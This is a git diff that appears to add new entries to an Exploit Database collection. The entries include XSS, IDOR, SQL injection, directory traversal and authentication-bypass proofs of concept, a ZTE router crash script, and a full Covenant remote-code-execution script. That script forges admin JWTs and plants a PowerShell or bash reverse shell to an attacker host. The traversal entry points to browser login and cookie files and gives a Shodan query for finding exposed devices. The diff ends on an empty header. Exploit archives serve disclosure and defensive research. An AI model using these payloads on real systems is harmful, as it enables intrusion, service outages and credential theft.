diff --git a/exploits/cgi/webapps/51148.txt b/exploits/cgi/webapps/51148.txt
new file mode 100644
index 000000000..51e73ebf1
--- /dev/null
+++ b/exploits/cgi/webapps/51148.txt
@@ -0,0 +1,20 @@
+# Exploit Title: LISTSERV 17 - Reflected Cross Site Scripting (XSS)
+# Google Dork: inurl:/scripts/wa.exe
+# Date: 12/01/2022
+# Exploit Author: Shaunt Der-Grigorian
+# Vendor Homepage: https://www.lsoft.com/
+# Software Link: https://www.lsoft.com/download/listserv.asp
+# Version: 17
+# Tested on: Windows Server 2019
+# CVE : CVE-2022-39195
+
+A reflected cross-site scripting (XSS) vulnerability in the LISTSERV 17 web interface allows remote attackers to inject arbitrary JavaScript or HTML via the "c" parameter.
+
+To reproduce, please visit
+http://localhost/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E
+(or whichever URL you can use for testing instead of localhost).
+
+The "c" parameter will reflect any value given onto the page.
+
+# Solution
+This vulnerability can be mitigated by going under "Server Administration" to "Web Templates" and editing the BODY-LCMD-MESSAGE web template. Change &+CMD; to &+HTMLENCODE(&+CMD;); .
\ No newline at end of file
diff --git a/exploits/cgi/webapps/51149.txt b/exploits/cgi/webapps/51149.txt
new file mode 100644
index 000000000..9b83aa17b
--- /dev/null
+++ b/exploits/cgi/webapps/51149.txt
@@ -0,0 +1,17 @@
+# Exploit Title: LISTSERV 17 - Insecure Direct Object Reference (IDOR)
+# Google Dork: inurl:/scripts/wa.exe
+# Date: 12/02/2022
+# Exploit Author: Shaunt Der-Grigorian
+# Vendor Homepage: https://www.lsoft.com/
+# Software Link: https://www.lsoft.com/download/listserv.asp
+# Version: 17
+# Tested on: Windows Server 2019
+# CVE : CVE-2022-40319
+
+# Steps to replicate
+1. Create two accounts on your LISTSERV 17 installation, logging into each one in a different browser or container.
+2. Intercept your attacking profile's browser traffic using Burp.
+3. When logging in, you'll be taken to a URL with your email address in the Y parameter (i.e. http://example.com/scripts/wa.exe?INDEX&X=[session-id]&Y=[email-address]).
+4. Click on your email address on the top right and select "Edit profile".
+5. In Burp, change the email address in the URL's Y parameter to the email address of your victim account.
+4. Next, the "WALOGIN" cookie value will be an ASCII encoded version of your email address. Using Burp Decoder, ASCII encode your victim's email address and replace the "WALOGIN" cookie value with that.5. Submit this request. You should now be accessing/editing the victim's profile. You can make modifications and access any information in this profile as long as you replace those two values in Burp for each request.
\ No newline at end of file
diff --git a/exploits/hardware/dos/51137.py b/exploits/hardware/dos/51137.py
new file mode 100755
index 000000000..ead1f0b47
--- /dev/null
+++ b/exploits/hardware/dos/51137.py
@@ -0,0 +1,49 @@
+# Exploit Title: ZTE-H108NS -  Stack Buffer Overflow (DoS)
+# Date: 19-11-2022
+# Exploit Author: George Tsimpidas
+# Vendor: https://www.zte.com.cn/global/
+# Firmware: H108NSV1.0.7u_ZRD_GR2_A68
+# Usage: python zte-exploit.py <victim-ip> <port>
+# CVE: N/A
+# Tested on: Debian 5.18.5
+
+#!/usr/bin/python3
+
+
+import sys
+import socket
+from time import sleep
+
+host = sys.argv[1]  # Recieve IP from user
+port = int(sys.argv[2])  # Recieve Port from user
+
+junk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae"
+* 5
+
+
+buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1"
++ junk + b"&TestBtn=START HTTP/1.1\r\n"
+buffer += b"Host: 192.168.1.1\r\n"
+buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0)
+Gecko/20100101 Firefox/91.0\r\n"
+buffer += b"Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
+buffer += b"Accept-Language: en-US,en;q=0.5\r\n"
+buffer += b"Accept-Encoding: gzip, deflate\r\n"
+buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"
+buffer += b"Connection: Keep-Alive\r\n"
+buffer += b"Cookie:
+SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2;
+_TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n"
+buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n"
+
+
+
+
+print("[*] Sending evil payload...")
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host, port))
+s.send(buffer)
+sleep(1)
+s.close()
+print("[+] Crashing boom boom ~ check if target is down ;)")
\ No newline at end of file
diff --git a/exploits/hardware/remote/51138.txt b/exploits/hardware/remote/51138.txt
new file mode 100644
index 000000000..52e201976
--- /dev/null
+++ b/exploits/hardware/remote/51138.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Router ZTE-H108NS - Authentication Bypass
+# Date: 19-11-2022
+# Exploit Author: George Tsimpidas
+# Vendor: https://www.zte.com.cn/global/
+# Firmware: H108NSV1.0.7u_ZRD_GR2_A68
+# CVE: N/A
+# Tested on: Debian 5.18.5
+
+Description :
+
+When specific http methods are listed within a security constraint,
+then only those
+methods are protected. Router ZTE-H108NS defines the following http
+methods: GET, POST, and HEAD. HEAD method seems to fall under a flawed
+operation which allows the HEAD to be implemented correctly with every
+Response Status Code.
+
+
+Proof Of Concept :
+
+Below request bypasses successfully the Basic Authentication, and
+grants access to the Administration Panel of the Router.
+
+
+HEAD /cgi-bin/tools_admin.asp HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: SESSIONID=1cd6bb77
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
\ No newline at end of file
diff --git a/exploits/linux/webapps/51139.txt b/exploits/linux/webapps/51139.txt
new file mode 100644
index 000000000..f6a495a12
--- /dev/null
+++ b/exploits/linux/webapps/51139.txt
@@ -0,0 +1,75 @@
+# Exploit Title: Boa Web Server v0.94.14 - Authentication Bypass
+#Date: 19-11-2022
+# Exploit Author: George Tsimpidas
+# Vendor: https://github.com/gpg/boa
+# CVE: N/A
+# Tested on: Debian 5.18.5
+
+Description :
+
+Boa Web Server Versions from 0.94.13 - 0.94.14 fail to validate the
+correct security constraint on the HEAD http method allowing everyone
+to bypass the Basic Authorization Mechanism.
+
+Culprit :
+
+if (!memcmp(req->logline, "GET ", 4))
+req->method = M_GET;
+else if (!memcmp(req->logline, "HEAD ", 5))
+/* head is just get w/no body */
+req->method = M_HEAD;
+else if (!memcmp(req->logline, "POST ", 5))
+req->method = M_POST;
+else {
+log_error_doc(req);
+fprintf(stderr, "malformed request: \"%s\"\n", req->logline);
+send_r_not_implemented(req);
+return 0;
+}
+
+The req->method = M_HEAD; is being parsed directly  on the  response.c
+file, looking at how the method is being implemented for one of the
+response codes :
+
+/* R_NOT_IMP: 505 */
+void send_r_bad_version(request * req)
+{
+    SQUASH_KA(req);
+    req->response_status = R_BAD_VERSION;
+    if (!req->simple) {
+        req_write(req, "HTTP/1.0 505 HTTP Version Not Supported\r\n");
+        print_http_headers(req);
+        req_write(req, "Content-Type: " HTML "\r\n\r\n"); /* terminate
+header */
+    }
+    if (req->method != M_HEAD) {
+        req_write(req,
+                  "<HTML><HEAD><TITLE>505 HTTP Version Not
+Supported</TITLE></HEAD>\n"
+                  "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTP
+versions "
+                  "other than 0.9 and 1.0 "
+                  "are not supported in Boa.\n<p><p>Version encountered: ");
+        req_write(req, req->http_version);
+        req_write(req, "<p><p></BODY></HTML>\n");
+    }
+    req_flush(req);
+}
+
+
+Above code condition indicates that if (req->method != M_HEAD)  therefore
+if the the requested method does not equal to M_HEAD then
+
+req_write(req,
+                  "<HTML><HEAD><TITLE>505 HTTP Version Not
+Supported</TITLE></HEAD>\n"
+                  "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTP
+versions "
+                  "other than 0.9 and 1.0 "
+                  "are not supported in Boa.\n<p><p>Version encountered: ");
+        req_write(req, req->http_version);
+        req_write(req, "<p><p></BODY></HTML>\n");
+    }
+
+So if the method actually contains the http method of HEAD it's being
+passed  for every function that includes all the response code methods.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51134.txt b/exploits/multiple/webapps/51134.txt
new file mode 100644
index 000000000..8623422d9
--- /dev/null
+++ b/exploits/multiple/webapps/51134.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Dreamer CMS v4.0.0 - SQL Injection
+# Date: 2022/10/02
+# Exploit Author: lvren
+# Vendor Homepage: http://cms.iteachyou.cc/
+# Software Link: https://gitee.com/isoftforce/dreamer_cms/repository/archive/v4.0.0.zip
+# Version: v4.0.0
+# CVE: CVE-2022-43128
+
+Proof Of Concept:
+
+POST /admin/search/doSearch HTTP/1.1
+Host: localhost:8888
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 80
+Origin: http://localhost:8888
+Connection: close
+Referer: http://localhost:8888/admin/search/doSearch
+Cookie: dreamer-cms-s=6387e44f-e700-462d-bba5-d4e0ffff5739
+Upgrade-Insecure-Requests: 1
+
+entity[typeid']=1) AND (SELECT 2904 FROM (SELECT(SLEEP(5)))TdVL) AND (5386=5386
+
+
+
+lvren
+lvren@lvre.ntesmail.com
+
+签名由 网易灵犀办公 定制
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51141.py b/exploits/multiple/webapps/51141.py
new file mode 100755
index 000000000..a311f02a4
--- /dev/null
+++ b/exploits/multiple/webapps/51141.py
@@ -0,0 +1,438 @@
+# Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)
+# Exploit Author: xThaz
+# Author website: https://xthaz.fr/
+# Date: 2022-09-11
+# Vendor Homepage: https://cobbr.io/Covenant.html
+# Software Link: https://github.com/cobbr/Covenant
+# Version: v0.1.3 - v0.5
+# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker
+
+# Vulnerability
+## Discoverer: coastal
+## Date: 2020-07-13
+## Discoverer website: https://blog.null.farm
+## References:
+##   - https://blog.null.farm/hunting-the-hunters
+##   - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb
+
+# !/usr/bin/env python3
+# encoding: utf-8
+
+
+import jwt  # pip3 install PyJWT
+import json
+import warnings
+import base64
+import re
+import random
+import argparse
+
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+from Crypto.Hash import HMAC, SHA256  # pip3 install pycryptodome
+from Crypto.Util.Padding import pad
+from Crypto.Cipher import AES
+from requests import request  # pip3 install requests
+from subprocess import run
+from pwn import remote, context  # pip3 install pwntools
+from os import remove, urandom
+from shutil import which
+from urllib.parse import urlparse
+from pathlib import Path
+from time import time
+
+
+def check_requirements():
+    if which("mcs") is None:
+        print("Please install the mono framework in order to compile the payload.")
+        print("https://www.mono-project.com/download/stable/")
+        exit(-1)
+
+
+def random_hex(length):
+    alphabet = "0123456789abcdef"
+    return ''.join(random.choice(alphabet) for _ in range(length))
+
+
+def request_api(method, token, route, body=""):
+    warnings.simplefilter('ignore', InsecureRequestWarning)
+
+    return request(
+        method,
+        f"{args.target}/api/{route}",
+        json=body,
+        headers={
+            "Authorization": f"Bearer {token}",
+            "Content-Type": "application/json"
+        },
+        verify=False
+    )
+
+
+def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"):
+    secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'
+
+    payload_data = {
+        "sub": username,
+        "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",
+        "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,
+        "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [
+            "User",
+            "Administrator"
+        ],
+        "exp": int(time()) + 360,
+        "iss": "Covenant",
+        "aud": "Covenant"
+    }
+
+    token = jwt.encode(payload_data, secret_key, algorithm='HS256')
+    return token
+
+
+def get_id_admin(token, json_roles):
+    id_admin = ""
+    for role in json_roles:
+        if role["name"] == "Administrator":
+            id_admin = role["id"]
+            print(f"\t[*] Found the admin group id : {id_admin}")
+            break
+    else:
+        print("\t[!] Did not found admin group id, quitting !")
+        exit(-1)
+
+    id_admin_user = ""
+    json_users_roles = request_api("get", token, f"users/roles").json()
+    for user_role in json_users_roles:
+        if user_role["roleId"] == id_admin:
+            id_admin_user = user_role["userId"]
+            print(f"\t[*] Found the admin user id : {id_admin_user}")
+            break
+    else:
+        print("\t[!] Did not found admin id, quitting !")
+        exit(-1)
+
+    json_users = request_api("get", token, f"users").json()
+    for user in json_users:
+        if user["id"] == id_admin_user:
+            username_admin = user["userName"]
+            print(f"\t[*] Found the admin username : {username_admin}")
+            return username_admin, id_admin_user
+    else:
+        print("\t[!] Did not found admin username, quitting !")
+        exit(-1)
+
+
+def compile_payload():
+    if args.os == "windows":
+        payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'
+    else:
+        payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'
+
+    dll = """using System;
+using System.Reflection;
+
+namespace ExampleDLL{
+    public class Class1{
+        public Class1(){
+        }
+
+        public void Main(string[] args){
+            System.Diagnostics.Process.Start(""" + payload + """);
+        }
+    }
+}
+"""
+
+    temp_dll_path = f"/tmp/{random_hex(8)}"
+    Path(f"{temp_dll_path}.cs").write_bytes(dll.encode())
+    print(f"\t[*] Writing payload in {temp_dll_path}.cs")
+
+    compilo_path = which("mcs")
+    compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])
+    if compilation.returncode:
+        print("\t[!] Error when compiling DLL, quitting !")
+        exit(-1)
+    print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")
+
+    dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()
+
+    remove(temp_dll_path + ".cs")
+    remove(temp_dll_path + ".dll")
+    print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")
+    return dll_encoded
+
+
+def generate_wrapper(dll_encoded):
+    wrapper = """public static class MessageTransform {
+    public static string Transform(byte[] bytes) {
+        try {
+            string assemblyBase64 = \"""" + dll_encoded + """\";
+            var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);
+            var assembly = System.Reflection.Assembly.Load(assemblyBytes);
+            foreach (var type in assembly.GetTypes()) {
+                object instance = System.Activator.CreateInstance(type);
+                object[] args = new object[] { new string[] { \"\" } };
+                try {
+                    type.GetMethod(\"Main\").Invoke(instance, args);
+                }
+                catch {}
+            }
+        }
+        catch {}
+        return System.Convert.ToBase64String(bytes);
+    }
+
+    public static byte[] Invert(string str) {
+        return System.Convert.FromBase64String(str);
+    }
+}"""
+
+    return wrapper
+
+
+def upload_profile(token, wrapper):
+    body = {
+        'httpUrls': [
+            '/en-us/index.html',
+            '/en-us/docs.html',
+            '/en-us/test.html'
+        ],
+        'httpRequestHeaders': [
+            {'name': 'User-Agent',
+             'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '
+                      'Safari/537.36'},
+            {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}
+        ],
+        'httpResponseHeaders': [
+            {'name': 'Server', 'value': 'Microsoft-IIS/7.5'}
+        ],
+        'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',
+        'httpGetResponse': '{DATA}',
+        'httpPostResponse': '{DATA}',
+        'id': 0,
+        'name': random_hex(8),
+        'description': '',
+        'type': 'HTTP',
+        'messageTransform': wrapper
+    }
+
+    response = request_api("post", token, "profiles/http", body)
+
+    if not response.ok:
+        print("\t[!] Failed to create the listener profile, quitting !")
+        exit(-1)
+    else:
+        profile_id = response.json().get('id')
+        print(f"\t[*] Profile created with id {profile_id}")
+        print("\t[*] Successfully created the listener profile")
+        return profile_id
+
+
+def generate_valid_listener_port(impersonate_token, tries=0):
+    if tries >= 10:
+        print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")
+        exit(-1)
+
+    port = random.randint(8000, 8250)  # TO BE EDITED WITH YOUR TARGET LISTENER PORT
+    listeners = request_api("get", impersonate_token, "listeners").json()
+
+    port_used = []
+    for listener in listeners:
+        port_used.append(listener["bindPort"])
+
+    if port in port_used:
+        print(f"\t[!] Port {port} is already taken by another listener, retrying !")
+        generate_valid_listener_port(impersonate_token, tries + 1)
+    else:
+        print(f"\t[*] Port {port} seems free")
+        return port
+
+
+def get_id_listener_type(impersonate_token, listener_name):
+    response = request_api("get", impersonate_token, "listeners/types")
+    if not response.ok:
+        print("\t[!] Failed to get the listener type, quitting !")
+        exit(-1)
+    else:
+        for listener_type in response.json():
+            if listener_type["name"] == listener_name:
+                print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}')
+                return listener_type["id"]
+
+
+def generate_listener(impersonate_token, profile_id):
+    listener_port = generate_valid_listener_port(impersonate_token)
+    listener_name = random_hex(8)
+    data = {
+        'useSSL': False,
+        'urls': [
+            f"http://0.0.0.0:{listener_port}"
+        ],
+        'id': 0,
+        'name': listener_name,
+        'bindAddress': "0.0.0.0",
+        'bindPort': listener_port,
+        'connectAddresses': [
+            "0.0.0.0"
+        ],
+        'connectPort': listener_port,
+        'profileId': profile_id,
+        'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),
+        'status': 'Active'
+    }
+
+    response = request_api("post", impersonate_token, "listeners/http", data)
+
+    if not response.ok:
+        print("\t[!] Failed to create the listener, quitting !")
+        exit(-1)
+    else:
+        print("\t[*] Successfully created the listener")
+        listener_id = response.json().get("id")
+        return listener_id, listener_port
+
+
+def create_grunt(impersonate_token, data):
+    stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"]
+    if stager_code == "":
+        stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"]
+        if stager_code == "":
+            print("\t[!] Failed to create the grunt payload, quitting !")
+            exit(-1)
+
+    print("\t[*] Successfully created the grunt payload")
+    return stager_code
+
+
+def get_grunt_config(impersonate_token, listener_id):
+    data = {
+        'id': 0,
+        'listenerId': listener_id,
+        'implantTemplateId': 1,
+        'name': 'Binary',
+        'description': 'Uses a generated .NET Framework binary to launch a Grunt.',
+        'type': 'binary',
+        'dotNetVersion': 'Net35',
+        'runtimeIdentifier': 'win_x64',
+        'validateCert': True,
+        'useCertPinning': True,
+        'smbPipeName': 'string',
+        'delay': 0,
+        'jitterPercent': 0,
+        'connectAttempts': 0,
+        'launcherString': 'GruntHTTP.exe',
+        'outputKind': 'consoleApplication',
+        'compressStager': False
+    }
+
+    stager_code = create_grunt(impersonate_token, data)
+    aes_key = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code)
+    guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)
+    if not aes_key or not guid_prefix:
+        print("\t[!] Failed to retrieve the grunt configuration, quitting !")
+        exit(-1)
+
+    aes_key = aes_key.group(1)
+    guid_prefix = guid_prefix.group(1)
+    print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")
+    return aes_key, guid_prefix
+
+
+def aes256_cbc_encrypt(key, message):
+    iv_bytes = urandom(16)
+    key_decoded = base64.b64decode(key)
+    encoded_message = pad(message.encode(), 16)
+
+    cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes)
+    encrypted = cipher.encrypt(encoded_message)
+
+    hmac = HMAC.new(key_decoded, digestmod=SHA256)
+    signature = hmac.update(encrypted).digest()
+
+    return encrypted, iv_bytes, signature
+
+
+def trigger_exploit(listener_port, aes_key, guid):
+    message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"
+
+    ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)
+    data = {
+        "GUID": guid,
+        "Type": 0,
+        "Meta": '',
+        "IV": base64.b64encode(iv).decode(),
+        "EncryptedMessage": base64.b64encode(ciphered).decode(),
+        "HMAC": base64.b64encode(signature).decode()
+    }
+
+    json_data = json.dumps(data).encode("utf-8")
+    payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73"
+
+    if send_exploit(listener_port, "Cookie", guid, payload):
+        print("\t[*] Exploit succeeded, check listener")
+    else :
+        print("\t[!] Exploit failed, retrying")
+        if send_exploit(listener_port, "Cookies", guid, payload):
+            print("\t[*] Exploit succeeded, check listener")
+        else:
+            print("\t[!] Exploit failed, quitting")
+
+
+def send_exploit(listener_port, header_cookie, guid, payload):
+    context.log_level = 'error'
+
+    request = f"""POST /en-us/test.html HTTP/1.1\r
+Host: {IP_TARGET}:{listener_port}\r
+User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r
+{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\r
+Content-Type: application/x-www-form-urlencoded\r
+Content-Length: {len(payload)}\r
+\r
+{payload}
+""".encode()
+
+    sock = remote(IP_TARGET, listener_port)
+    sock.sendline(request)
+    response = sock.recv().decode()
+    sock.close()
+
+    if "HTTP/1.1 200 OK" in response:
+        return True
+    else:
+        return False
+
+if __name__ == "__main__":
+    check_requirements()
+
+    parser = argparse.ArgumentParser()
+    parser.add_argument("target",
+                        help="URL where the Covenant is hosted, example : https://127.0.0.1:7443")
+    parser.add_argument("os",
+                        help="Operating System of the target",
+                        choices=["windows", "linux"])
+    parser.add_argument("lhost",
+                        help="IP of the machine that will receive the reverse shell")
+    parser.add_argument("lport",
+                        help="Port of the machine that will receive the reverse shell")
+    args = parser.parse_args()
+
+    IP_TARGET = urlparse(args.target).hostname
+
+    print("[*] Getting the admin info")
+    sacrificial_token = craft_jwt("xThaz")
+    roles = request_api("get", sacrificial_token, "roles").json()
+    admin_username, admin_id = get_id_admin(sacrificial_token, roles)
+    impersonate_token = craft_jwt(admin_username, admin_id)
+    print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")
+
+    print("[*] Generating payload")
+    dll_encoded = compile_payload()
+    wrapper = generate_wrapper(dll_encoded)
+    print("[*] Uploading malicious listener profile")
+    profile_id = upload_profile(impersonate_token, wrapper)
+
+    print("[*] Generating listener")
+    listener_id, listener_port = generate_listener(impersonate_token, profile_id)
+
+    print("[*] Triggering the exploit")
+    aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)
+    trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51142.txt b/exploits/multiple/webapps/51142.txt
new file mode 100644
index 000000000..15dd2764a
--- /dev/null
+++ b/exploits/multiple/webapps/51142.txt
@@ -0,0 +1,54 @@
+# Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal
+# Exploit Author: Spinae
+# Vendor Homepage: https://www.virtualreception.nl/
+# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY
+# Tested on: all
+
+We discovered the web server of the Virtual Reception appliance is prone to
+an unauthenticated directory traversal vulnerability. This allows an
+attacker to traverse outside the server root directory by specifying files
+at the end of a URL request.
+This is a NUC5i5RY
+
+http://[ip address]/c:/WINDOWS/System32/drivers/etc/hosts
+http://[ip address]/C:/windows/WindowsUpdate.log
+...
+
+A user called 'receptie' exists on the Windows system:
+
+http://[ip address]/c:/users/receptie/ntuser.dat
+http://[ip address]/c:/users/receptie/ntuser.ini
+http://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log
+...
+http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User
+Data/Default/Login Data
+http://[ip
+address]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20State
+http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User
+Data/Default/Cookies
+...
+
+The appliance also keeps a log of the visitors that register at the
+entrance:
+
+http://[ip address]/visitors.csv
+
+hash icon for shodan searches:
+
+https://www.shodan.io/search?query=http.favicon.hash%3A656388049
+
+No reply from the vendor (phone, email, website form submissions), first
+reported in 2021.
+
+--
+DISCLAIMER: Unless indicated otherwise, the information contained in this
+message is privileged and confidential, and is intended only for the use of
+the addressee(s) named above and others who have been specifically
+authorized to receive it. If you are not the intended recipient, you are
+hereby notified that any dissemination, distribution or copying of this
+message and/or attachments is strictly prohibited. The company accepts no
+liability for any damage caused by any virus transmitted by this message.
+Furthermore, the company does not warrant a proper and complete
+transmission of this information, nor does it accept liability for any
+delays. If you have received this message in error, please contact the
+sender and delete the message. Thank you.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51150.txt b/exploits/multiple/webapps/51150.txt
new file mode 100644
index 000000000..e6247273e
--- /dev/null
+++ b/exploits/multiple/webapps/51150.txt
@@ -0,0 +1,67 @@
+# Exploit Title: Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)
+# Exploit Author: Andrey Stoykov
+# Software Link: https://github.com/Shoplazza/LifeStyle
+# Version: 1.1
+# Tested on: Ubuntu 20.04
+
+
+Stored XSS #1:
+
+To reproduce do the following:
+
+1. Login as normal user account
+2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post"
+3. Select "Title" and enter payload "><script>alert(1)</script>
+
+
+// HTTP POST request showing XSS payload
+
+PATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1=
+.1
+Host: test1205.myshoplaza.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
+101 Firefox/100.0
+[...]
+
+{"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\"><s=
+cript>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","c=
+ontent":"<p>\"><script>alert(3)</script></p>"[...]
+
+
+// HTTP response showing unsanitized XSS payload
+
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=3Dutf-8
+[...]
+
+{"article":{"title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\=
+"><script>alert(2)</script>","published":true,"seo_title":"Title\"><script>=
+alert(1)</script>"[...]
+
+
+// HTTP GET request to trigger XSS payload
+
+GET /blog/titlescriptalert1script?st=3DeyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9=
+.eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC=
+03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUK=
+Enfj9L49I HTTP/1.1
+Host: test1205.myshoplaza.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
+101 Firefox/100.0
+[...]
+
+
+// HTTP response showing unsanitized XSS payload
+
+HTTP/1.1 200 OK
+Content-Type: text/html; charset=3DUTF-8
+[...]
+
+<meta name=3D"viewport" content=3D"width=3Ddevice-width,initial-scale=3D1,m=
+inimum-scale=3D1,maximum-scale=3D1,user-scalable=3Dno,viewport-fit=3Dcover"=
+>
+<title>Title"><script>alert(1)</script></title>
+<meta name=3D"keywords" content=3D"test1205">
+[...]
+
+--rehcsed-054bdeb7-e1dc-47b8-a8d3-67ca7da532d2--
\ No newline at end of file
diff --git a/exploits/php/webapps/51135.txt b/exploits/php/webapps/51135.txt
new file mode 100644
index 000000000..4990185fc
--- /dev/null
+++ b/exploits/php/webapps/51135.txt
